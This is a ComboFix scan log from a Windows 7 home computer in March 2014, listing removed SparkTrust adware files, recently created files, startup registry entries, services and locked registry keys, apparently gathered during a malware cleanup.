Microsoft Windows 7 Home Premium 6.1.7601.1.1252.61.1033.18.2047.996 [GMT 10:00]
Running from: c:\users\Paulette\Desktop\ComboFix.exe
Command switches used :: c:\users\Paulette\Desktop\CFScript.txt
AV: avast! Antivirus *Disabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
FW: avast! Antivirus *Disabled* {2F96FC65-F07D-9D1E-5A6E-3DA5C487EAF0}
SP: avast! Antivirus *Disabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\program files (x86)\Common Files\SparkTrust
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\ad_generic.jpg
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\close.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\close_md.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\close_mo.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\close_pu.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\close_pu_md.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\close_pu_mo.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\Logo.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\min.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\min_md.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\min_mo.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\progress_glow.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\topbar_gradient.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\LiteUnzip.dll
c:\program files (x86)\Common Files\SparkTrust\UUS3\settings.xml
c:\program files (x86)\Common Files\SparkTrust\UUS3\Update3.exe
c:\program files (x86)\Common Files\SparkTrust\UUS3\UUS3.dll
.
.
((((((((((((((((((((((((( Files Created from 2014-02-26 to 2014-03-26 )))))))))))))))))))))))))))))))
.
.
2014-03-26 06:25 . 2014-03-26 06:25 -------- d-----w- c:\users\Guest\AppData\Local\temp
2014-03-26 06:25 . 2014-03-26 06:25 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-03-26 05:43 . 2014-03-26 05:43 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{18BA5166-823F-4253-906A-07F23A0153F3}\offreg.dll
2014-03-18 14:41 . 2014-03-19 21:58 -------- d-----w- C:\FRST
2014-03-17 03:09 . 2014-03-17 03:09 -------- d-----w- c:\windows\ERUNT
2014-03-17 02:39 . 2014-03-20 00:20 -------- d-----w- C:\AdwCleaner
2014-03-16 05:22 . 2014-03-16 05:22 440672 ----a-w- c:\windows\system32\drivers\aswndisflt.sys
2014-03-16 05:19 . 2014-03-16 05:19 -------- d-----w- c:\users\Paulette\AppData\Roaming\AVAST Software
2014-03-15 23:06 . 2014-03-15 23:06 80184 ----a-w- c:\windows\system32\drivers\aswStm.sys
2014-03-15 23:06 . 2014-03-15 23:06 207904 ----a-w- c:\windows\system32\drivers\aswVmm.sys
2014-03-15 23:06 . 2014-03-15 23:06 65776 ----a-w- c:\windows\system32\drivers\aswRvrt.sys
2014-03-15 23:06 . 2014-03-15 23:06 421704 ----a-w- c:\windows\system32\drivers\aswSP.sys
2014-03-15 23:06 . 2014-03-15 23:06 1038072 ----a-w- c:\windows\system32\drivers\aswSnx.sys
2014-03-15 23:06 . 2014-03-15 23:06 92544 ----a-w- c:\windows\system32\drivers\aswRdr2.sys
2014-03-15 23:06 . 2014-03-15 23:06 78648 ----a-w- c:\windows\system32\drivers\aswMonFlt.sys
2014-03-15 23:06 . 2014-03-15 23:06 28184 ----a-w- c:\windows\system32\drivers\aswKbd.sys
2014-03-15 23:06 . 2014-03-15 23:06 334136 ----a-w- c:\windows\system32\aswBoot.exe
2014-03-15 23:06 . 2014-03-15 23:06 43152 ----a-w- c:\windows\avastSS.scr
2014-03-15 23:05 . 2014-03-15 23:05 -------- d-----w- c:\program files\AVAST Software
2014-03-15 23:02 . 2014-03-15 23:02 -------- d-----w- c:\programdata\AVAST Software
2014-03-12 22:58 . 2014-02-04 02:32 624128 ----a-w- c:\windows\system32\qedit.dll
2014-03-12 22:58 . 2014-02-04 02:04 509440 ----a-w- c:\windows\SysWow64\qedit.dll
2014-03-12 22:58 . 2014-02-04 02:32 1424384 ----a-w- c:\windows\system32\WindowsCodecs.dll
2014-03-12 22:58 . 2014-02-04 02:04 1230336 ----a-w- c:\windows\SysWow64\WindowsCodecs.dll
2014-03-09 23:02 . 2014-03-09 23:02 -------- d-----w- c:\users\Paulette\AppData\Roaming\Malwarebytes
2014-03-09 22:00 . 2014-03-10 03:20 -------- d-----w- c:\users\Paulette\AppData\Local\LogMeIn Rescue Applet
2014-03-09 03:27 . 2013-12-17 23:38 40248 ----a-w- c:\windows\system32\TURegOpt.exe
2014-03-09 03:27 . 2013-12-17 23:38 29496 ----a-w- c:\windows\system32\authuitu.dll
2014-03-09 03:27 . 2013-12-17 23:38 25400 ----a-w- c:\windows\SysWow64\authuitu.dll
2014-03-09 03:27 . 2014-03-09 03:27 -------- d-----w- c:\users\Paulette\AppData\Roaming\AVG
2014-03-09 03:25 . 2014-03-09 03:29 -------- d-----w- c:\programdata\AVG
2014-03-09 03:25 . 2014-03-09 03:33 -------- d-sh--w- c:\programdata\{01BD4FC9-2F86-4706-A62E-774BB7E9D308}
2014-02-28 00:28 . 2014-03-15 21:29 -------- d-----w- c:\program files (x86)\MediaViewV1
2014-02-24 23:17 . 2014-02-24 23:17 -------- d-----w- c:\program files (x86)\MediaViewerV1
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-03-19 10:46 . 2014-01-20 11:20 90015360 ----a-w- c:\windows\system32\MRT.exe
2014-03-12 21:17 . 2014-02-06 09:45 71048 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-03-12 21:17 . 2014-02-06 09:45 692616 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2014-01-29 22:57 . 2014-01-29 22:57 194048 ----a-w- c:\windows\SysWow64\elshyph.dll
2014-01-29 22:56 . 2014-01-29 22:56 645120 ----a-w- c:\windows\SysWow64\jsIntl.dll
2014-01-29 22:56 . 2014-01-29 22:56 235008 ----a-w- c:\windows\system32\elshyph.dll
2014-01-29 22:56 . 2014-01-29 22:56 71680 ----a-w- c:\windows\SysWow64\RegisterIEPKEYs.exe
2014-01-29 22:56 . 2014-01-29 22:56 182272 ----a-w- c:\windows\SysWow64\msls31.dll
2014-01-29 22:56 . 2014-01-29 22:56 62464 ----a-w- c:\windows\SysWow64\tdc.ocx
2014-01-29 22:56 . 2014-01-29 22:56 34816 ----a-w- c:\windows\SysWow64\JavaScriptCollectionAgent.dll
2014-01-29 22:56 . 2014-01-29 22:56 337408 ----a-w- c:\windows\SysWow64\html.iec
2014-01-29 22:56 . 2014-01-29 22:56 24576 ----a-w- c:\windows\SysWow64\licmgr10.dll
2014-01-29 22:56 . 2014-01-29 22:56 151552 ----a-w- c:\windows\SysWow64\iexpress.exe
2014-01-29 22:56 . 2014-01-29 22:56 139264 ----a-w- c:\windows\SysWow64\wextract.exe
2014-01-29 22:56 . 2014-01-29 22:56 1051136 ----a-w- c:\windows\SysWow64\mshtmlmedia.dll
2014-01-29 22:56 . 2014-01-29 22:56 61952 ----a-w- c:\windows\SysWow64\MshtmlDac.dll
2014-01-29 22:56 . 2014-01-29 22:56 36352 ----a-w- c:\windows\SysWow64\imgutil.dll
2014-01-29 22:56 . 2014-01-29 22:56 13312 ----a-w- c:\windows\SysWow64\mshta.exe
2014-01-29 22:56 . 2014-01-29 22:56 86016 ----a-w- c:\windows\SysWow64\iesysprep.dll
2014-01-29 22:56 . 2014-01-29 22:56 74240 ----a-w- c:\windows\SysWow64\SetIEInstalledDate.exe
2014-01-29 22:56 . 2014-01-29 22:56 48640 ----a-w- c:\windows\SysWow64\mshtmler.dll
2014-01-29 22:56 . 2014-01-29 22:56 111616 ----a-w- c:\windows\SysWow64\IEAdvpack.dll
2014-01-29 22:56 . 2014-01-29 22:56 942592 ----a-w- c:\windows\system32\jsIntl.dll
2014-01-29 22:56 . 2014-01-29 22:56 86016 ----a-w- c:\windows\system32\RegisterIEPKEYs.exe
2014-01-29 22:56 . 2014-01-29 22:56 247808 ----a-w- c:\windows\system32\msls31.dll
2014-01-29 22:56 . 2014-01-29 22:56 90112 ----a-w- c:\windows\system32\SetIEInstalledDate.exe
2014-01-29 22:56 . 2014-01-29 22:56 52224 ----a-w- c:\windows\system32\msfeedsbs.dll
2014-01-29 22:56 . 2014-01-29 22:56 13312 ----a-w- c:\windows\system32\msfeedssync.exe
2014-01-29 22:56 . 2014-01-29 22:56 131072 ----a-w- c:\windows\system32\IEAdvpack.dll
2014-01-29 22:56 . 2014-01-29 22:56 48640 ----a-w- c:\windows\system32\mshtmler.dll
2014-01-29 22:56 . 2014-01-29 22:56 105984 ----a-w- c:\windows\system32\iesysprep.dll
2014-01-29 22:56 . 2014-01-29 22:56 77312 ----a-w- c:\windows\system32\tdc.ocx
2014-01-29 22:56 . 2014-01-29 22:56 40448 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2014-01-29 22:56 . 2014-01-29 22:56 616104 ----a-w- c:\windows\system32\ieapfltr.dat
2014-01-29 22:56 . 2014-01-29 22:56 453120 ----a-w- c:\windows\system32\dxtmsft.dll
2014-01-29 22:56 . 2014-01-29 22:56 413696 ----a-w- c:\windows\system32\html.iec
2014-01-29 22:56 . 2014-01-29 22:56 296960 ----a-w- c:\windows\system32\dxtrans.dll
2014-01-29 22:56 . 2014-01-29 22:56 81408 ----a-w- c:\windows\system32\icardie.dll
2014-01-29 22:56 . 2014-01-29 22:56 235520 ----a-w- c:\windows\system32\url.dll
2014-01-29 22:56 . 2014-01-29 22:56 1228800 ----a-w- c:\windows\system32\mshtmlmedia.dll
2014-01-29 22:56 . 2014-01-29 22:56 263376 ----a-w- c:\windows\system32\iedkcs32.dll
2014-01-29 22:56 . 2014-01-29 22:56 84992 ----a-w- c:\windows\system32\mshtmled.dll
2014-01-29 22:56 . 2014-01-29 22:56 30208 ----a-w- c:\windows\system32\licmgr10.dll
2014-01-29 22:56 . 2014-01-29 22:56 243200 ----a-w- c:\windows\system32\webcheck.dll
2014-01-29 22:56 . 2014-01-29 22:56 101376 ----a-w- c:\windows\system32\inseng.dll
2014-01-29 22:56 . 2014-01-29 22:56 167424 ----a-w- c:\windows\system32\iexpress.exe
2014-01-29 22:56 . 2014-01-29 22:56 143872 ----a-w- c:\windows\system32\wextract.exe
2014-01-29 22:56 . 2014-01-29 22:56 62464 ----a-w- c:\windows\system32\pngfilt.dll
2014-01-29 22:56 . 2014-01-29 22:56 147968 ----a-w- c:\windows\system32\occache.dll
2014-01-29 22:56 . 2014-01-29 22:56 13824 ----a-w- c:\windows\system32\mshta.exe
2014-01-29 22:56 . 2014-01-29 22:56 774144 ----a-w- c:\windows\system32\jscript.dll
2014-01-29 22:56 . 2014-01-29 22:56 83968 ----a-w- c:\windows\system32\MshtmlDac.dll
2014-01-29 22:56 . 2014-01-29 22:56 48128 ----a-w- c:\windows\system32\imgutil.dll
2014-01-29 22:56 . 2014-01-29 22:56 135680 ----a-w- c:\windows\system32\iepeers.dll
2014-01-29 07:53 . 2014-01-29 07:53 9728 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 9728 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 5632 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 5632 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-ole32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 5632 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 5632 ---ha-w- c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 4096 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-user32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 4096 ---ha-w- c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 3584 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-advapi32-l2-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 3072 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-version-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 3072 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-shell32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 3072 ---ha-w- c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 3072 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 2560 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 522752 ----a-w- c:\windows\system32\XpsGdiConverter.dll
2014-01-29 07:53 . 2014-01-29 07:53 364544 ----a-w- c:\windows\SysWow64\XpsGdiConverter.dll
2014-01-29 07:53 . 2014-01-29 07:53 3584 ---ha-w- c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 2776576 ----a-w- c:\windows\system32\msmpeg2vdec.dll
2014-01-29 07:53 . 2014-01-29 07:53 2560 ---ha-w- c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 2284544 ----a-w- c:\windows\SysWow64\msmpeg2vdec.dll
2014-01-29 07:53 . 2014-01-29 07:53 1682432 ----a-w- c:\windows\system32\XpsPrint.dll
2014-01-29 07:53 . 2014-01-29 07:53 1158144 ----a-w- c:\windows\SysWow64\XpsPrint.dll
2014-01-29 07:53 . 2014-01-29 07:53 10752 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 10752 ---ha-w- c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 604160 ----a-w- c:\windows\SysWow64\d3d10level9.dll
2014-01-29 07:53 . 2014-01-29 07:53 363008 ----a-w- c:\windows\system32\dxgi.dll
2014-01-29 07:53 . 2014-01-29 07:53 249856 ----a-w- c:\windows\SysWow64\d3d10_1core.dll
2014-01-29 07:53 . 2014-01-29 07:53 220160 ----a-w- c:\windows\SysWow64\d3d10core.dll
2014-01-29 07:53 . 2014-01-29 07:53 207872 ----a-w- c:\windows\SysWow64\WindowsCodecsExt.dll
2014-01-29 07:53 . 2014-01-29 07:53 1643520 ----a-w- c:\windows\system32\DWrite.dll
2014-01-29 07:53 . 2014-01-29 07:53 161792 ----a-w- c:\windows\SysWow64\d3d10_1.dll
2014-01-29 07:53 . 2014-01-29 07:53 1247744 ----a-w- c:\windows\SysWow64\DWrite.dll
2014-01-29 07:53 . 2014-01-29 07:53 1175552 ----a-w- c:\windows\system32\FntCache.dll
2014-01-29 07:53 . 2014-01-29 07:53 1080832 ----a-w- c:\windows\SysWow64\d3d10.dll
2014-01-29 07:53 . 2014-01-29 07:53 296960 ----a-w- c:\windows\system32\d3d10core.dll
2014-01-29 07:53 . 2014-01-29 07:53 1238528 ----a-w- c:\windows\system32\d3d10.dll
2014-01-29 07:53 . 2014-01-29 07:53 333312 ----a-w- c:\windows\system32\d3d10_1core.dll
2014-01-29 07:53 . 2014-01-29 07:53 245248 ----a-w- c:\windows\system32\WindowsCodecsExt.dll
2014-01-29 07:53 . 2014-01-29 07:53 194560 ----a-w- c:\windows\system32\d3d10_1.dll
2014-01-29 07:53 . 2014-01-29 07:53 648192 ----a-w- c:\windows\system32\d3d10level9.dll
2014-01-29 07:53 . 2014-01-29 07:53 293376 ----a-w- c:\windows\SysWow64\dxgi.dll
2014-01-29 07:53 . 2014-01-29 07:53 221184 ----a-w- c:\windows\system32\UIAnimation.dll
2014-01-29 07:53 . 2014-01-29 07:53 187392 ----a-w- c:\windows\SysWow64\UIAnimation.dll
2014-01-25 22:46 . 2009-07-14 02:36 175616 ----a-w- c:\windows\system32\msclmd.dll
2014-01-25 22:46 . 2009-07-14 02:36 152576 ----a-w- c:\windows\SysWow64\msclmd.dll
2014-01-21 01:03 . 2010-06-24 01:33 22240 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1AMPCBOK]
@="{04cd1f3e-81d5-4904-a3ab-e0f99a7d769d}"
[HKEY_CLASSES_ROOT\CLSID\{04cd1f3e-81d5-4904-a3ab-e0f99a7d769d}]
2010-11-05 01:58 297808 ----a-w- c:\windows\System32\mscoree.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"StartCCC"="c:\program files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2009-09-08 98304]
"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2013-09-13 59720]
"EEventManager"="c:\program files (x86)\Epson Software\Event Manager\EEventManager.exe" [2009-12-03 976320]
"AvastUI.exe"="c:\program files\AVAST Software\Avast\AvastUI.exe" [2014-03-15 3767096]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\windows]
"LoadAppInit_DLLs"=1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\drivers32]
"aux"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ sasnative64\0autocheck autochk *
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\run-]
"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe"
.
R2 BBSvc;Bing Bar Update Service;c:\program files (x86)\Microsoft\BingBar\BBSvc.EXE;c:\program files (x86)\Microsoft\BingBar\BBSvc.EXE [x]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R3 aswStm;aswStm;c:\windows\system32\drivers\aswStm.sys;c:\windows\SYSNATIVE\drivers\aswStm.sys [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0;PCDSRVC{F36B3A4C-F95654BD-06000000}_0 - PCDR Kernel Mode Service Helper Driver;c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms;c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
S0 aswRvrt;avast! Revert; [x]
S0 aswVmm;avast! VM Monitor; [x]
S1 aswKbd;aswKbd;c:\windows\system32\drivers\aswKbd.sys;c:\windows\SYSNATIVE\drivers\aswKbd.sys [x]
S1 aswNdisFlt;Avast! Firewall Driver;c:\windows\system32\DRIVERS\aswNdisFlt.sys;c:\windows\SYSNATIVE\DRIVERS\aswNdisFlt.sys [x]
S1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys;c:\windows\SYSNATIVE\drivers\aswSnx.sys [x]
S1 aswSP;aswSP;c:\windows\system32\drivers\aswSP.sys;c:\windows\SYSNATIVE\drivers\aswSP.sys [x]
S2 ABBYY.Licensing.FineReader.Sprint.9.0;ABBYY FineReader 9.0 Sprint Licensing Service;c:\program files (x86)\Common Files\ABBYY\FineReaderSprint\9.00\Licensing\NetworkLicenseServer.exe;c:\program files (x86)\Common Files\ABBYY\FineReaderSprint\9.00\Licensing\NetworkLicenseServer.exe [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys;c:\windows\SYSNATIVE\drivers\aswMonFlt.sys [x]
S2 avast! Firewall;avast! Firewall;c:\program files\AVAST Software\Avast\afwServ.exe;c:\program files\AVAST Software\Avast\afwServ.exe [x]
S2 BBUpdate;BBUpdate;c:\program files (x86)\Microsoft\BingBar\SeaPort.EXE;c:\program files (x86)\Microsoft\BingBar\SeaPort.EXE [x]
S2 cvhsvc;Client Virtualization Handler;c:\program files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE;c:\program files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE [x]
S2 EPSON_EB_RPCV4_04;EPSON V5 Service4(04);c:\program files\Common Files\EPSON\EPW!3 SSRP\E_S50STB.EXE;c:\program files\Common Files\EPSON\EPW!3 SSRP\E_S50STB.EXE [x]
S2 EPSON_PM_RPCV4_04;EPSON V3 Service4(04);c:\program files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE;c:\program files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE [x]
S2 MBAMScheduler;MBAMScheduler;c:\program files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe;c:\program files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [x]
S2 MBAMService;MBAMService;c:\program files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe;c:\program files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [x]
S2 sftlist;Application Virtualization Client;c:\program files (x86)\Microsoft Application Virtualization Client\sftlist.exe;c:\program files (x86)\Microsoft Application Virtualization Client\sftlist.exe [x]
S2 TuneUp.UtilitiesSvc;AVG PC TuneUp Service;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe [x]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys;c:\windows\SYSNATIVE\drivers\mbam.sys [x]
S3 Sftfs;Sftfs;c:\windows\system32\DRIVERS\Sftfslh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftfslh.sys [x]
S3 Sftplay;Sftplay;c:\windows\system32\DRIVERS\Sftplaylh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftplaylh.sys [x]
S3 Sftredir;Sftredir;c:\windows\system32\DRIVERS\Sftredirlh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftredirlh.sys [x]
S3 Sftvol;Sftvol;c:\windows\system32\DRIVERS\Sftvollh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftvollh.sys [x]
S3 sftvsa;Application Virtualization Service Agent;c:\program files (x86)\Microsoft Application Virtualization Client\sftvsa.exe;c:\program files (x86)\Microsoft Application Virtualization Client\sftvsa.exe [x]
S3 TuneUpUtilitiesDrv;TuneUpUtilitiesDrv;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [x]
.
.
Contents of the 'Scheduled Tasks' folder
.
2014-03-26 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-02-06 21:17]
.
2014-01-20 c:\windows\Tasks\PCDRScheduledMaintenance.job
- c:\program files\PC-Doctor for Windows\pcdrcui.exe [2009-09-18 07:11]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00avast]
@="{472083B0-C522-11CF-8763-00608CC02F24}"
[HKEY_CLASSES_ROOT\CLSID\{472083B0-C522-11CF-8763-00608CC02F24}]
2014-03-15 23:06 287280 ----a-w- c:\program files\AVAST Software\Avast\ashShA64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1AMPCBOK]
@="{04cd1f3e-81d5-4904-a3ab-e0f99a7d769d}"
[HKEY_CLASSES_ROOT\CLSID\{04cd1f3e-81d5-4904-a3ab-e0f99a7d769d}]
2010-11-05 01:57 444752 ----a-w- c:\windows\System32\mscoree.dll
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
IE: E&xport to Microsoft Excel - c:\progra~2\MICROS~1\Office12\EXCEL.EXE/3000
TCP: DhcpNameServer = 192.168.0.1
.
- - - - ORPHANS REMOVED - - - -
.
BHO-{13070af0-bc6c-4185-8baa-40a4cf05b323} - (no file)
BHO-{497c088e-1b2a-43fe-8431-d5d257f37546} - (no file)
Wow6432Node-HKLM-Run-<NO NAME> - (no file)
ShellIconOverlayIdentifiers-{4d87b7a7-23f1-470c-aa45-96b25b9bd138} - (no file)
.
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PCDSRVC{F36B3A4C-F95654BD-06000000}_0]
"ImagePath"="\??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-1730965262-3147105662-1425472414-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.eml\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="WindowsLiveMail.Email.1"
.
[HKEY_USERS\S-1-5-21-1730965262-3147105662-1425472414-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vcf\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="WindowsLiveMail.VCard.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil10c.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\LocalServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\FlashUtil10c.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10c.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.10"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10c.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
